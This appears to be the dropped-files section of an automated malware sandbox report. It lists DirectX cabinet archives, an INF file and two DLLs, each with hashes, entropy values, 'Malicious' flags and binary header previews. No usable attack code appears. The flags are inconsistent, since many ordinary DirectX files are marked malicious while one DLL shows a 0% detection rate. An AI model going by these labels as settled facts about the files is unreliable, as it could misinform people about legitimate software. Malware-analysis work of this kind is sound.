                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176943 bytes, 6 files, at 0x44 +A "xact2_3_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):186111
                                                                                              Entropy (8bit):7.995685991314543
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:yglGrmTM3Ne3LnSYZr66OltMlRz/EFa6xoXJMOL7CmAvyl81g5K7VQLWRrZL:xESKSRr66OltMlWFa6xoMOL7vmGGCArN
                                                                                              MD5:4BA26F9DCCAEBD7BE849A076EC82D6FF
                                                                                              SHA1:42FB0D0089D8BC92735820F475968F59AF4E4365
                                                                                              SHA-256:13E7EB934A7596E7C3B7D8A0962E68DA841D9C73D154825DC982FF6D05CFF221
                                                                                              SHA-512:4E4FD8A31AC3C2F8CC66D434103C0097AB3FBE2C2E8140AAE2F95FC4AC1927AAE9CDCE8730DD7C4DAD785D9A653D90B0F914B258BB5695C68CA93F605AC82DD4
                                                                                              Malicious:true
                                                                                              Preview:MSCF..../.......D................!........../....#..................! .........4.R .xact2_3_x64.cat..@..! ....C4)E .x3daudio1_0.dll......`.....4.K .xactengine2_3.dll............4.K .infinst.exe.....!......4{R .aug2006_xact_x64.inf............4{R .xact2_3_x64.inf.+.{..9..[.........R.P...O...\7.$Hb...l...RI..(D7...G.)..0..J.zH)J.R..x$..H...........>>.evHh......;....d....xT6@'.u...Q.n...#s.......!.Pq...o...... ......X....,-....h... ......q..G.. ,.........(.~.CzJ8t.P..J.FHR|.D.........` d..PC/.N...I...<.'.o....8.t..t7.....Q.E%.J..8.l......t"....Z....&.(.p.:........n.ML.@..Ny........9......P'.|...w..@.{B!\.h.P.....:.G...t g.."..{.@'..u....z........|......#A..8.q....v..E@..g.@.~.\i@......`9..y.G..p._.b...C%K.....Y...6R3...v"..J.a>.Co.dcEOv&D:...~.A.Y..^......{.x........`n....].D~.E...(..^"..N'....W...g...?....9.}.?.....z.3q.......Y....AV.?_0.w[..F.......CU).76....6.O.C......|...I...@...|..bC..p.S......l... .H<.S.I. .f(..`*^..Y..W...._....0_...._9..yj.+X
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 894638 bytes, 5 files, at 0x44 "D3DCompiler_42.dll" "D3DCompiler_42_x86.cat", flags 0x4, ID 10010, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):903806
                                                                                              Entropy (8bit):7.998441664012848
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:kWl8lkb28nNHiYNk9tb59zmj000KFiBudeBsbgy:No8NHi7/pAJioEy
                                                                                              MD5:87BDAE64FD47A75F867A290EC7B8A4B7
                                                                                              SHA1:DD9E69E1815E8BC161E8EB89A0F2A296074BB95D
                                                                                              SHA-256:6BD32337826F5A5141FC06391919A249E984150905C2546DC8BFC33D41A24E82
                                                                                              SHA-512:C8F7A490722741DF4E03823880C6D623FF16AB648A40C1B1C8F7BF26C92499EB34C4596BF239337CD23A57974757958AD9A30D42A4141DC0E7522F998ED3893A
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1565194 bytes, 5 files, at 0x44 +A "d3dx9_32_x64.cat" +A "d3dx9_32.dll", flags 0x4, ID 6631, number 1, extra bytes 20 in head, 137 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1574362
                                                                                              Entropy (8bit):7.999757508861621
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:AbmMc7lXv7PY1QKs16rjZ1w00Z2xgaJgYRf4MyHGktr3+mlQmxHw8gEeGrs+RDb1:Km7lXk1Zs1Mj0SgyqP3RvxQX7G3H1
                                                                                              MD5:2290064562F2D6D197765F4EDEBC5BF0
                                                                                              SHA1:70C2E3C3EB521BA4C46C428D57166631F86512C8
                                                                                              SHA-256:DA1CE01BE39F41F967282849715E8310DC1887BFEB92C4E0166D2C31F00647F7
                                                                                              SHA-512:B25A517DE79668E3ABD88ACDE835DF4A0D69E70CE0E001DB31D5DEBCD812BCE46F4ADA5E07C036C7BBE88D6DFC9F6531B2198F03FC27FA46070C790B45955DEC
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 188715 bytes, 6 files, at 0x44 +A "xact2_6_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8448, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):197883
                                                                                              Entropy (8bit):7.995921670109717
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:aX7CLQxFiIUEWXDCsi3jGg+U2p2z51zHdZ5a:78iE1sx0s
                                                                                              MD5:CC622A75240CA96FA8F28BD984BED5BC
                                                                                              SHA1:424F216C5C0E02AE654612EAEB04900C9DAFBC61
                                                                                              SHA-256:3454D5101716A5C17BCDEE8632668D981F99E8558D8D05E20A33ED718ED8C2AC
                                                                                              SHA-512:EAB36CD6BC3AE6F67D89996785F9C7D51E140BFB839A866B4E4FFA7809846DF861D30D1FCE2E1A498E8403DECA5CCBC50B8F37F4C1B4AD3CD3A63B150C49ECEF
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 126449 bytes, 5 files, at 0x44 +A "xact_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 6923, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):135617
                                                                                              Entropy (8bit):7.992141777548868
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:EaLgbEzMsJxjJDOAfpPt4HvbVs/m2EKtaVNRF+kA5Y0L5XP/JwObYeM57H:LkgzfxjUWL/3EKtqNlGYeXqObkL
                                                                                              MD5:FEC720C0C15C43569EA9FAB7CEAFEA95
                                                                                              SHA1:C65235B40865725A00675F1BC013BA8B77307669
                                                                                              SHA-256:6456FC26622F3A72B9449ED0E61874CF1ADBA23CCCBFCDA1324F033FE0788FDA
                                                                                              SHA-512:8EDEE940930E3C610E709E2C6348ABAB479628BFAC71A0C507F46AF8D80F1F0C6E31C7C44AF5F884668CE472B281FF18CB44A97AB68232D455B7BC8F89A75268
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191162 bytes, 7 files, at 0x44 +A "xact2_8_x64.cat" +A "x3daudio1_2.dll", flags 0x4, ID 10131, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200354
                                                                                              Entropy (8bit):7.996324633982409
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:Oxuwfa4lebkGyR+DPZLOYZ9lD7baC+PJEDzfYPO6quXhBhYDLk0siPnJ8WKKiu:Oja4WkNWOYxX1+++vRB200ssJ8G
                                                                                              MD5:B9648D12DF695290BE0479C1E78894C7
                                                                                              SHA1:932627D40A83411F9F4006792ADEEB4C3A74CF37
                                                                                              SHA-256:3F2CA0ACCEF2594FB014296F4111B7FBB59729C5D928B22F7283C392494FEE7C
                                                                                              SHA-512:240B622B02C5FA3D036043ECBE5BF29FEE447147AF36E795BFAE83FAFA35934FC22A3E9CC2D846BD880D7808897355E16696C555146EE69864472D4600AD25B6
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1330042 bytes, 5 files, at 0x44 +A "d3dx9_26_x64.cat" +A "d3dx9_26.dll", flags 0x4, ID 6675, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1339234
                                                                                              Entropy (8bit):7.999619123900207
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:acfUVHkSDmhcG/IQtmLMLfNYIpTTHh0am4l76wbh:XUBvDzfQtCMLfNYqXqal75l
                                                                                              MD5:05103E47F259FA22D27C871E4CDEE7D9
                                                                                              SHA1:502FA5D15FE56DCF64431BB7437E723137284899
                                                                                              SHA-256:794E23D8B08F88BB0D339825B3628C24CD0297195657F9871EE6324786FADA36
                                                                                              SHA-512:180E0ABBD97B6781C6639C6AB2A2355400B8E32784A8469C3CBEDEA23B121CAC5BA17F6AA509610D0A1E5830735455690F574054D6224A6A5D2AE70EDB601835
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 756228 bytes, 5 files, at 0x44 "d3dcsx_43.dll" "d3dcsx_43_x86.cat", flags 0x4, ID 7878, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):765396
                                                                                              Entropy (8bit):7.996955154936438
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:C8Dx0/99rEneJVyrxcsaWmeUEEBTJNCK/FcZZXlewc3/2tqCyrIUl3z82ItDwh2Z:XDO19AVrRfEHNZWZrs3+ICyco3MDISTT
                                                                                              MD5:E34C0CF1BD5A68C80BDC709A452EB322
                                                                                              SHA1:4DD4553EC7E2E42D51A716B1F4CB58588BCAA164
                                                                                              SHA-256:799B517227812252481C9C9B22CF16FF185FFC20B9273612C8A37153B53AAD93
                                                                                              SHA-512:3488A52F6FD3681B10624546B923368245F969330D4909E91C5B58F159CD24B258A8A2274D62243CA5CA9F1FB40F9F248B3BD92283F775DD24BAF68ECC5FD03D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):57739
                                                                                              Entropy (8bit):5.688682745352895
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eNITdgil00BU0twUZB7otN4PTH+y491I7/su6U3mI9rITogZD0+pYnrIvdgsl0KW:eEBDSYj4kiJOnitAmfdwe5q24jIxwzKI
                                                                                              MD5:0DAFB23D5BD4B80C79A0F82DC2DE34D0
                                                                                              SHA1:8159FD03F133C9CD8CFB194971A5250B9ECDA0A8
                                                                                              SHA-256:3EF4C33102886EAE3C812B948FF3FBF70BB03DD91E772B852DA3F9AAF75BDB29
                                                                                              SHA-512:78E7FB35CAB3D0ACE4E4FEF2868CC5F31B2254C267402779893B3F3FCE90B8D784328AC19EF0D6BD37D975D557917BE19D7A8A32A94FF8606AFD36883EC1C9BB
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DirectX_Win9X]..DisplayName=%DirectX_Win9X%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4608,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x.cab",3..URL2="dinput_w9x_81.cab",3..URL3="dplay_w9x.cab",3..URL4="dshow_w9x.cab",3..URL5="dshow_w9x_81.cab",3..URL6="graphics_w9x.cab",3..URL7="graphics_w9x_81.cab",3..URL8="ks_w9x.cab",3..URL9="vb_w9x.cab",3..URL10="bda_w9x.cab",3..URL11="setup_w9x.cab",3..Version="9,29,1962,0"....[DirectX_Win98_ENG]..DisplayName=%DirectX_Win98%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4348,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x_eng.cab",3..URL2="dinput_w9x_81_eng.cab",3..URL3="dplay_w9x_eng.cab",3..URL4="dshow_w9x_eng.cab",3..URL5="dxdiag_w9x_eng.cab",3..URL6="graphics_w9x_eng.cab"
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
